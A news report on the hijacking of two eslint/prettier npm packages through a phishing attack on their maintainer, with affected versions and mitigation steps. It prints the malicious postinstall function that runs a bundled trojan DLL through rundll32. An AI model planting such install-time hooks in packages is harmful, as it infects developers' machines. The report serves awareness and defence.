In a stark reminder of the vulnerabilities plaguing open-source software, widely used npm packages were hijacked this week through a sophisticated phishing attack, transforming essential developer tools into malware distribution vehicles. The compromised libraries—eslint-config-prettier and eslint-plugin-prettier, which streamline code formatting for millions of JavaScript projects—were weaponized after their maintainer's credentials were stolen, enabling attackers to publish malicious versions that infect Windows machines upon installation. As reported by Ax Sharma for BleepingComputer, this incident is the latest in a series of supply chain assaults exploiting the trust-based nature of open-source communities.

The Phishing Scheme and Compromise

The attack began when the maintainer, known as JounQin, received a spoofed email disguised as an official npm support message urging him to "verify his account." The email, appearing to originate from [email protected], redirected to a fraudulent domain (npnjs[.]com), leading to credential theft. JounQin confirmed the breach in a GitHub thread, stating:

"It's this phishing email... I've deleted that npm token and will publish a new version ASAP. Thanks all, and sorry for my negligence."

Using the stolen npm token, attackers published unauthorized versions of the packages (eslint-config-prettier v8.10.1, 9.1.1, 10.1.6, 10.1.7 and eslint-plugin-prettier v4.2.2, 4.2.3). These versions lacked corresponding GitHub commits, raising immediate red flags among vigilant developers like Dasa Paddock, who flagged the anomalies in a GitHub issue. The packages were swiftly deprecated on npm, but not before they could be downloaded and executed in development environments.

Malware Mechanics: From Postinstall Script to Trojan DLL

The malicious versions included a deceptive postinstall script (install.js) designed to run automatically upon package installation. Ostensibly named to monitor disk space, the script contained a function logDiskSpace() that executed a bundled Windows DLL (node-gyp.dll) via the rundll32 process. Security researchers noted that this DLL acts as a trojan, with only 19 of 72 antivirus engines detecting it on VirusTotal at the time of the breach—highlighting its evasive capabilities. For clarity, here’s a snippet of the malicious code:

function logDiskSpace() {
  // Malicious execution flow
  const dllPath = require('path').join(__dirname, 'node-gyp.dll');
  require('child_process').exec(`rundll32.exe ${dllPath},EntryPoint`);
}

This code exemplifies how attackers leverage npm's scripting features to bypass defenses, turning routine developer workflows into infection vectors. Windows systems are particularly at risk, as the DLL can deploy additional payloads, exfiltrate data, or establish persistent access.

Mitigation Steps for Developers

If you use these packages, take immediate action:

  • Audit Dependencies: Check package-lock.json or yarn.lock for references to the compromised versions (e.g., eslint-config-prettier 8.10.1–10.1.7 or eslint-plugin-prettier 4.2.2–4.2.3). Remove and replace them with safe versions.
  • Scan Environments: Inspect CI/CD logs and runtime systems for execution of install.js or node-gyp.dll, especially on Windows. Rotate all exposed secrets (e.g., API keys, tokens) used during builds after July 18.
  • Enhance Vigilance: Monitor other packages by the same maintainer for tampering and implement multi-factor authentication (MFA) for npm accounts to thwart credential theft.

Broader Implications for Open-Source Security

This breach is not isolated. Recent months have seen similar attacks, including the hijacking of 17 Gluestack packages for RAT deployment and npm info-stealer campaigns. Each incident exposes the fragility of software supply chains, where a single maintainer’s compromised credentials can endanger millions of users. The open-source model’s reliance on volunteer maintainers—often without enterprise-grade security resources—creates a systemic risk that attackers increasingly exploit.

As the industry grapples with these challenges, this event serves as a catalyst for adopting stricter publishing controls, automated dependency scanning, and enhanced maintainer education. Until then, the onus falls on developers to fortify their workflows, proving that in the digital age, trust must be coupled with relentless verification to safeguard the tools that power our code.

Source: BleepingComputer (Ax Sharma), July 19, 2025.